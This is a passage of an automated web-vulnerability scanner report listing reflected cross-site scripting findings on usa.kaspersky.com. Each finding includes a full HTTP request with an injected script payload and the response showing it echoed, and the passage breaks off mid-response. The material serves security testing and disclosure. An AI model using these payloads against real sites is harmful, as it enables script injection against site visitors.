Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:53:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687623"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:53:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/57832c8c6"-alert(1)-"cba96d0e5ac";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.207. http://usa.kaspersky.com/node/5843 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5843

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5566a"-alert(1)-"fc3945c3865 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node5566a"-alert(1)-"fc3945c3865/5843 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:56:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687783"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:56:36 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node5566a"-alert(1)-"fc3945c3865/5843";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.208. http://usa.kaspersky.com/node/5843 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5843

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f52f"><script>alert(1)</script>df54a0ddf80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node7f52f"><script>alert(1)</script>df54a0ddf80/5843 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687754"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:56:00 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node7f52f"><script>alert(1)</script>df54a0ddf80/5843" />
...[SNIP]...

1.209. http://usa.kaspersky.com/node/5843 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5843

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65a8"><script>alert(1)</script>280e90c6401 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5843f65a8"><script>alert(1)</script>280e90c6401 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687932"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:58:58 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5843f65a8"><script>alert(1)</script>280e90c6401" />
...[SNIP]...

1.210. http://usa.kaspersky.com/node/5843 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5843

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 317bf"-alert(1)-"1a46fd532ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5843317bf"-alert(1)-"1a46fd532ac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:59:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687950"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:59:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5843317bf"-alert(1)-"1a46fd532ac";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.211. http://usa.kaspersky.com/node/5856/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5856/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb96"><script>alert(1)</script>96238517795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node3eb96"><script>alert(1)</script>96238517795/5856/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:53:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687632"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:53:59 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node3eb96"><script>alert(1)</script>96238517795/5856/lightbox2" />
...[SNIP]...

1.212. http://usa.kaspersky.com/node/5856/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5856/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61121"-alert(1)-"a45942e7997 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node61121"-alert(1)-"a45942e7997/5856/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:54:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687652"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:54:19 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node61121"-alert(1)-"a45942e7997/5856/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.213. http://usa.kaspersky.com/node/5856/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5856/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ffa6"-alert(1)-"c6fcae58665 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/58568ffa6"-alert(1)-"c6fcae58665/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:56:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687793"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:56:42 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/58568ffa6"-alert(1)-"c6fcae58665/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.214. http://usa.kaspersky.com/node/5856/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5856/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb11"><script>alert(1)</script>8663698a068 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/58567bb11"><script>alert(1)</script>8663698a068/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687750"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:56:06 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/58567bb11"><script>alert(1)</script>8663698a068/lightbox2" />
...[SNIP]...

1.215. http://usa.kaspersky.com/node/5856/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5856/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262e6"><script>alert(1)</script>4d1670dd320 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5856/lightbox2262e6"><script>alert(1)</script>4d1670dd320 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:59:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687945"
Content-Type: text/html; charset=utf-8
Content-Length: 29887
Date: Sat, 18 Dec 2010 15:59:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5856/lightbox2262e6"><script>alert(1)</script>4d1670dd320" />
...[SNIP]...

1.216. http://usa.kaspersky.com/node/5856/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5856/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f93"><script>alert(1)</script>66260dd8d32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5856/lightbox2?e7f93"><script>alert(1)</script>66260dd8d32=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687497"
Content-Type: text/html; charset=utf-8
Content-Length: 13676
Date: Sat, 18 Dec 2010 15:51:49 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5856/lightbox2?e7f93"><script>alert(1)</script>66260dd8d32=1" />
...[SNIP]...

1.217. http://usa.kaspersky.com/node/5895/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5895/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0af"-alert(1)-"d11ea08630a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node1b0af"-alert(1)-"d11ea08630a/5895/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:54:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687673"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:54:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node1b0af"-alert(1)-"d11ea08630a/5895/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.218. http://usa.kaspersky.com/node/5895/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5895/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f9f4"><script>alert(1)</script>66ef792f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node3f9f4"><script>alert(1)</script>66ef792f0a7/5895/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:54:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687650"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:54:18 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node3f9f4"><script>alert(1)</script>66ef792f0a7/5895/lightbox2" />
...[SNIP]...

1.219. http://usa.kaspersky.com/node/5895/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5895/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0b8"><script>alert(1)</script>c16bac04b10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5895da0b8"><script>alert(1)</script>c16bac04b10/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:56:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687802"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:57:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
